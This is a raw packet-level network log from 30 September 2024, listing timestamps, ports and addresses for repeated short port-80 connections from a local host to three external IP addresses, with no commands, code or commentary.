                                              Sep 30, 2024 16:08:19.772993088 CEST8064074142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:20.506685972 CEST8064074142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:20.506732941 CEST8064074142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:20.506798029 CEST6407480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:20.507497072 CEST6407480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:20.507517099 CEST6407480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:21.734288931 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:21.739542961 CEST8064075172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:21.739675045 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:21.739964008 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:21.744827986 CEST8064075172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:22.296705961 CEST8064075172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:22.296765089 CEST8064075172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:22.296791077 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:22.296824932 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:22.297424078 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:22.297424078 CEST6407580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:23.552673101 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:23.558651924 CEST8051155108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:23.558722973 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:23.558990955 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:23.564881086 CEST8051155108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:24.268378019 CEST8051155108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:24.268443108 CEST8051155108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:24.268521070 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:24.269171953 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:24.269331932 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:24.274491072 CEST8051155108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:24.274579048 CEST5115580192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:25.541938066 CEST5115680192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:25.546916962 CEST8051156142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:25.547002077 CEST5115680192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:25.547204971 CEST5115680192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:25.552066088 CEST8051156142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:26.274126053 CEST8051156142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:26.274159908 CEST8051156142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:26.274226904 CEST5115680192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:26.274588108 CEST5115680192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:26.274610996 CEST5115680192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:27.545063972 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:27.549968004 CEST8051158172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:27.550072908 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:27.550349951 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:27.555212975 CEST8051158172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:28.163800955 CEST8051158172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:28.163870096 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:28.163979053 CEST8051158172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:28.164022923 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:28.164308071 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:28.164338112 CEST5115880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:29.456173897 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:29.461019993 CEST8051160108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:29.461088896 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:29.461282969 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:29.466483116 CEST8051160108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:30.175519943 CEST8051160108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:30.175571918 CEST8051160108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:30.175623894 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:30.175690889 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:30.176757097 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:30.176805019 CEST5116080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:31.456422091 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:31.461724997 CEST8051162142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:31.461808920 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:31.478295088 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:31.483091116 CEST8051162142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:32.169691086 CEST8051162142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:32.169841051 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:32.170299053 CEST8051162142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:32.170358896 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:32.171103001 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:32.177017927 CEST8051162142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:32.177090883 CEST5116280192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:33.435451031 CEST5116380192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:34.102334023 CEST8051163172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:34.102478981 CEST5116380192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:34.107275963 CEST5116380192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:34.121933937 CEST8051163172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:34.670366049 CEST8051163172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:34.670389891 CEST8051163172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:34.670583010 CEST5116380192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:34.670926094 CEST5116380192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:34.670926094 CEST5116380192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:35.911937952 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:35.917049885 CEST8051164108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:35.917119980 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:35.917330027 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:35.922162056 CEST8051164108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:36.711119890 CEST8051164108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:36.711132050 CEST8051164108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:36.711201906 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:36.711864948 CEST8051164108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:36.711911917 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:36.720609903 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:36.720710993 CEST5116480192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:37.994862080 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:37.999825954 CEST8051165142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:38.000088930 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:38.000540018 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:38.005430937 CEST8051165142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:38.727710962 CEST8051165142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:38.727787971 CEST8051165142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:38.727868080 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:38.727868080 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:38.734039068 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:38.734141111 CEST5116580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:40.105547905 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:40.110707045 CEST8051166172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:40.110779047 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:40.121731043 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:40.126578093 CEST8051166172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:40.677341938 CEST8051166172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:40.677391052 CEST8051166172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:40.677402973 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:40.677432060 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:40.677798033 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:40.677818060 CEST5116680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:42.272819042 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:42.277879953 CEST8051167108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:42.277961016 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:42.306715965 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:42.311497927 CEST8051167108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:42.994503975 CEST8051167108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:42.994533062 CEST8051167108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:42.994563103 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:42.994611025 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:42.996665955 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:42.996691942 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:43.001853943 CEST8051167108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:43.001972914 CEST5116780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:44.102993011 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:44.108130932 CEST8051168142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:44.108200073 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:44.141674995 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:44.146553993 CEST8051168142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:44.943521023 CEST8051168142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:44.943541050 CEST8051168142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:44.943591118 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:44.943634987 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:44.944016933 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:44.944036961 CEST5116880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:45.994874001 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:45.999794006 CEST8051169172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:45.999871016 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:46.001137018 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:46.006125927 CEST8051169172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:46.566046000 CEST8051169172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:46.566087961 CEST8051169172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:46.566112041 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:46.566148996 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:46.566533089 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:46.566581964 CEST5116980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:47.510173082 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:47.515230894 CEST8051170108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:47.515904903 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:47.560627937 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:47.565709114 CEST8051170108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:48.241724014 CEST8051170108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:48.241750002 CEST8051170108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:48.241789103 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:48.241828918 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:48.245172024 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:48.245284081 CEST5117080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:49.173706055 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:49.178584099 CEST8051171142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:49.178643942 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:49.178781986 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:49.183665037 CEST8051171142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:49.931474924 CEST8051171142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:49.931512117 CEST8051171142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:49.931582928 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:49.931582928 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:49.936148882 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:49.936176062 CEST5117180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:50.933732986 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:50.938695908 CEST8051172172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:50.938796043 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:50.987627029 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:50.992436886 CEST8051172172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:51.494869947 CEST8051172172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:51.494940042 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:51.494983912 CEST8051172172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:51.495053053 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:51.499180079 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:51.499202967 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:51.504430056 CEST8051172172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:51.505745888 CEST5117280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:52.278033018 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:52.283524036 CEST8051173108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:52.283685923 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:52.284068108 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:52.290489912 CEST8051173108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:52.991488934 CEST8051173108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:52.991512060 CEST8051173108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:52.991832018 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:52.991832972 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:53.005676985 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:53.005723000 CEST5117380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:53.765430927 CEST5117480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:53.770359993 CEST8051174142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:53.770591974 CEST5117480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:53.771833897 CEST5117480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:53.982752085 CEST8051174142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:54.681067944 CEST8051174142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:54.681083918 CEST8051174142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:54.681145906 CEST5117480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:54.685146093 CEST5117480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:54.685163021 CEST5117480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:55.454093933 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:55.459389925 CEST8051175172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:55.459471941 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:55.492539883 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:55.497478962 CEST8051175172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:56.018510103 CEST8051175172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:56.018582106 CEST8051175172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:56.018759012 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:56.019319057 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:56.019402981 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:56.024589062 CEST8051175172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:56.024641037 CEST5117580192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:56.820341110 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:56.826359034 CEST8051176108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:56.826461077 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:56.868261099 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:56.873610973 CEST8051176108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:57.553823948 CEST8051176108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:57.554146051 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:57.554316044 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:57.554316044 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:57.555399895 CEST8051176108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:57.556104898 CEST5117680192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:58.263195992 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:58.269216061 CEST8051177142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:58.269308090 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:58.269563913 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:58.274837017 CEST8051177142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:58.992912054 CEST8051177142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:58.992928028 CEST8051177142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:58.993050098 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:58.994220018 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:58.994251013 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:59.246459007 CEST8051177142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:59.246521950 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:59.254582882 CEST8051177142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:59.254630089 CEST5117780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:59.836657047 CEST5117980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:59.841836929 CEST8051179172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:59.841912031 CEST5117980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:59.843415976 CEST5117980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:59.848454952 CEST8051179172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:00.409792900 CEST8051179172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:00.409811974 CEST8051179172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:00.409899950 CEST5117980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:00.413749933 CEST5117980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:00.413934946 CEST5117980192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:01.673728943 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:01.678920984 CEST8051180108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:01.679003954 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:01.689575911 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:01.694560051 CEST8051180108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:02.390383005 CEST8051180108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:02.390430927 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:02.390683889 CEST8051180108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:02.390763998 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:02.390957117 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:02.390975952 CEST5118080192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:03.039601088 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:03.910698891 CEST8051181142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:03.910814047 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:03.989898920 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:03.994721889 CEST8051181142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:04.649612904 CEST8051181142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:04.649674892 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:04.649677038 CEST8051181142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:04.649722099 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:04.652558088 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:04.652581930 CEST5118180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:05.617943048 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:05.622831106 CEST8051182172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:05.622973919 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:05.623330116 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:05.629041910 CEST8051182172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:06.239308119 CEST8051182172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:06.239324093 CEST8051182172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:06.239360094 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:06.239422083 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:06.243462086 CEST8051182172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:06.243518114 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:06.246085882 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:06.246085882 CEST5118280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:07.016536951 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:07.028894901 CEST8051183108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:07.028966904 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:07.031204939 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:07.038537025 CEST8051183108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:07.757958889 CEST8051183108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:07.757976055 CEST8051183108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:07.758060932 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:07.758060932 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:07.762100935 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:07.762100935 CEST5118380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:08.595963955 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:08.602566957 CEST8051185142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:08.602644920 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:08.629743099 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:08.636193037 CEST8051185142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:09.332309961 CEST8051185142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:09.332483053 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:09.334065914 CEST8051185142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:09:09.334167004 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:09.340779066 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:09.340812922 CEST5118580192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:10.064546108 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.069454908 CEST8051186172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:10.069529057 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.069782019 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.074567080 CEST8051186172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:10.635104895 CEST8051186172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:10.635188103 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.635287046 CEST8051186172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:10.635333061 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.642343998 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.642380953 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:10.647469997 CEST8051186172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:09:10.647524118 CEST5118680192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:09:11.591506004 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:11.597516060 CEST8051187108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:11.597609043 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:11.597775936 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:11.602766037 CEST8051187108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:12.315287113 CEST8051187108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:12.315311909 CEST8051187108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:12.315345049 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:12.315404892 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:12.338994980 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:12.339088917 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:12.344108105 CEST8051187108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:09:12.344156981 CEST5118780192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:09:12.893942118 CEST5118880192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:09:12.901257992 CEST8051188142.250.110.82192.168.2.6
